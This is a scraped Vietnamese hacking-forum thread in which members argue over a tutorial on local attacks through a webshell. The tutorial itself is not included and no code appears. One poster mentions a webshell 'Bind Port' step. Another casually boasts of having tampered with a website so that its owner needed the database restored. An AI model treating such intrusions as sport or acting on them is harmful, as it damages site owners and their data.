Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67514 /hvaonline/posts/list/11448.html#67514 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67599 /hvaonline/posts/list/11448.html#67599 GMT Re: Tản mạn Local Attack :D Thiệt tình nói bồ Girl Noob đừng buồn, tôi đọc từ đầu đến giờ cũng hơn 3 trang rồi mà vẫn chưa thấy chỗ nào là của bồ Girl Noob tự viết hết. Những chi tiết bồ Girl Noob đưa ra đều hoặc sử dụng công cụ nào đó của người khác, hoặc khai thác một lỗi phần mềm đã biết nào đó, tôi vẫn chưa thấy được một chút gì đó gọi là sáng tạo hay của riêng cá nhân bồ Girl Noob.  Ai cũng biết nó là vậy nhưng không ai chịu share cả, h có người share ra lại bị nói là hông có sáng tạo, thiệt là Vietnamese ^^
Nếu phần kế tiếp bồ cũng chỉ tiếp tục quanh đi quẩn lại như thế thì dẫu bồ có get root được server, tôi cũng chẳng có hứng thú đọc tiếp. Nếu quả thật như thế, tôi chân thành khuyên bồ không nên viết tiếp nữa làm gì, mà nên dành thời gian để làm những việc khác có ích hơn, chẳng hạn như đọc sách. Vài góp ý, -m 
bác "mod" hông đọc nhưng cũng đừng delete hen, để noob vào đọc cho khuây khỏa, chắc bác mrro "có nhiều root" nên hổng cần get chi cho mệt :D vài lời]]>
/hvaonline/posts/list/11448.html#67611 /hvaonline/posts/list/11448.html#67611 GMT
Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67625 /hvaonline/posts/list/11448.html#67625 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67681 /hvaonline/posts/list/11448.html#67681 GMT Tản mạn Local Attack :D Ai cũng biết nó là vậy nhưng không ai chịu share cả, h có người share ra lại bị nói là hông có sáng tạo, thiệt là Vietnamese ^^   Hì xin lỗi, nhưng tôi tự hỏi, có ai đó học được gì từ topic này ngoài chuyện hướng dẫn sử dụng hai cái script có sẵn? Và nếu ai đó thay vì dành thời gian nghiền ngẫm những topic như vậy, dùng để đọc sách về Linux chẳng hạn, người đó có dễ dàng hiểu được chuyện gì thực sự đang xảy ra khi tôi click vào cái nút đó, hay nhập vào cái lệnh này ở ngay chỗ đó rồi nhấn enter? Sở dĩ tôi không thích topic này đơn giản vì nếu đã là topic hướng đến những người mới bắt đầu, tác giả nên giải thích tường tận chuyện gì thực sự xảy ra khi sử dụng các công cụ (và nếu không có các script có sẵn thì phải làm gì). Ví dụ như khi tôi nhập vào 1221 và nhấn nút Bind Port, thì đoạn code nào sẽ được thực thi và ý nghĩa của đoạn code đó là gì. Ở đây tác giả chỉ viết theo kiểu, 1. click chỗ này, 2. nhập cái này vào chỗ đó, 3. enter, 4. rồi hack được rồi đó. BTW, cái câu "thiệt là Vietnamese" của bồ rất khó nghe, chẳng biết nó có làm những người khác có suy nghĩ gì về bồ, riêng bản thân tôi chưa bao giờ đánh giá cao những người mở miệng ra là "thiệt là Vietnamese".
bác "mod" hông đọc nhưng cũng đừng delete hen, để noob vào đọc cho khuây khỏa, chắc bác mrro "có nhiều root" nên hổng cần get chi cho mệt :D  
Chưa có ai đề cập gì đến chuyện xóa hay đóng topic này cả. Tôi chỉ nói là tôi sẽ không đọc và không tham gia bình luận về nó bởi vì tôi không muốn phí thời gian làm những chuyện vô bổ. -m ]]>
/hvaonline/posts/list/11448.html#67684 /hvaonline/posts/list/11448.html#67684 GMT
Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67686 /hvaonline/posts/list/11448.html#67686 GMT Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67689 /hvaonline/posts/list/11448.html#67689 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67702 /hvaonline/posts/list/11448.html#67702 GMT Re: Tản mạn Local Attack :D Hì xin lỗi, nhưng tôi tự hỏi, có ai đó học được gì từ topic này ngoài chuyện hướng dẫn sử dụng hai cái script có sẵn? Và nếu ai đó thay vì dành thời gian nghiền ngẫm những topic như vậy, dùng để đọc sách về Linux chẳng hạn, người đó có dễ dàng hiểu được chuyện gì thực sự đang xảy ra khi tôi click vào cái nút đó, hay nhập vào cái lệnh này ở ngay chỗ đó rồi nhấn enter?  Tôi cũng chẳng biết tí tẹo gì về Linux, mà cũng chẳng muốn biết, cái này cũng tùy mỗi người. Tôi đọc bài viết này không phải là để học Linux, cũng không phải để thành hacker gì hết. Cái tôi học ở bài viết này đó là sự nguy hiểm của Local Attack thông qua webshell, nó giúp ích khi 1 khách hàng của tôi cần tư vấn về hosting, thế thôi.
BTW, cái câu "thiệt là Vietnamese" của bồ rất khó nghe, chẳng biết nó có làm những người khác có suy nghĩ gì về bồ, riêng bản thân tôi chưa bao giờ đánh giá cao những người mở miệng ra là "thiệt là Vietnamese".  
Ở đây đang nói tới cái tính giấu nghề của các bác nhà ta, vậy thôi. Vả lại tôi cũng không cần bro phải đánh giá cao thấp gì cả, hay là làm mod rồi lại đi đánh giá này nọ, thiệt là tức cười.
Chưa có ai đề cập gì đến chuyện xóa hay đóng topic này cả. Tôi chỉ nói là tôi sẽ không đọc và không tham gia bình luận về nó bởi vì tôi không muốn phí thời gian làm những chuyện vô bổ. 
Ok, gud]]>
/hvaonline/posts/list/11448.html#67712 /hvaonline/posts/list/11448.html#67712 GMT
Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67714 /hvaonline/posts/list/11448.html#67714 GMT Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67784 /hvaonline/posts/list/11448.html#67784 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67848 /hvaonline/posts/list/11448.html#67848 GMT Tản mạn Local Attack :D

ThangCuEm wrote:
.... Ở đây Tui thấy toàn là người có tiếng tăm trên UD . Nhưng thử hỏi lam sao để có cái danh này . Tấ cả đều là do mọi người viết bài , khai thác được lỗ hổng bảo mật , hack , biết cách sử dụng này lọ , ... Nói thật tui cũng có thể làm được tất cả mọi thứ nhưng có thể chỉ ở từng giới hạn của bản thân mình . ... Nếu bạn tìm được một erro ....  
:D Toàn người tiếng tăm và cái "danh" cùng nhưng từ ngữ rất sai chính tả + nữa Anh nữa Việt của cậu tớ chỉ quote lại cái câu này thôi :

rgv wrote:
kết luận : Anh ko tin được em 
Hì hì, hóa ra cậu tin em í à ... tớ chưa tin em ấy 1 phút nào kể từ cái sáng em ấy chửi tớ ( sáng sau cái đêm mà tớ nghịch vnmagic rồi em í phải lạy lục van xin tớ với ku des HCV restore lại cho em í cái DB --- rồi sáng đấy em í chuyển server =)) )
Tôi cũng chẳng biết tí tẹo gì về Linux, mà cũng chẳng muốn biết, cái này cũng tùy mỗi người. Tôi đọc bài viết này không phải là để học Linux, cũng không phải để thành hacker gì hết. Cái tôi học ở bài viết này đó là sự nguy hiểm của Local Attack thông qua webshell, nó giúp ích khi 1 khách hàng của tôi cần tư vấn về hosting, thế thôi.  
Ôi bạn gì ơi cậu làm nghề gì thế =)) , "nó giúp ích khi 1 khách hàng của tôi cần tư vấn về hosting" ... cái local attack rẻ mạt này cậu hiểu được có nghĩa là cậu chống được à .. như mrro nói, nó step by step đến nỗi 1 click 2 điền 3 en tơ =)) ... 1 nhà bảo mật cần cái nhìn tổng quát okie ? :D ]]>
/hvaonline/posts/list/11448.html#67850 /hvaonline/posts/list/11448.html#67850 GMT
Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67859 /hvaonline/posts/list/11448.html#67859 GMT Tản mạn Local Attack :D .... Ở đây Tui thấy toàn là người có tiếng tăm trên UD . Nhưng thử hỏi lam sao để có cái danh này . Tấ cả đều là do mọi người viết bài , khai thác được lỗ hổng bảo mật , hack , biết cách sử dụng này lọ , ... Nói thật tui cũng có thể làm được tất cả mọi thứ nhưng có thể chỉ ở từng giới hạn của bản thân mình . ... Nếu bạn tìm được một erro ....   ]]> /hvaonline/posts/list/11448.html#67875 /hvaonline/posts/list/11448.html#67875 GMT Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67880 /hvaonline/posts/list/11448.html#67880 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67882 /hvaonline/posts/list/11448.html#67882 GMT Tản mạn Local Attack :D không bàn về vấn đề Local Attack hoặc vấn đề thâm nhập thì xin mời post ở một topic khác. Nếu tình trạng đả kích nhau vẫn còn tiếp diễn mà GirL Noob không còn tiếp tục post các bước tiếp theo thì khoai sẽ khóa topic này lại. khoai]]> /hvaonline/posts/list/11448.html#67917 /hvaonline/posts/list/11448.html#67917 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67938 /hvaonline/posts/list/11448.html#67938 GMT Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67947 /hvaonline/posts/list/11448.html#67947 GMT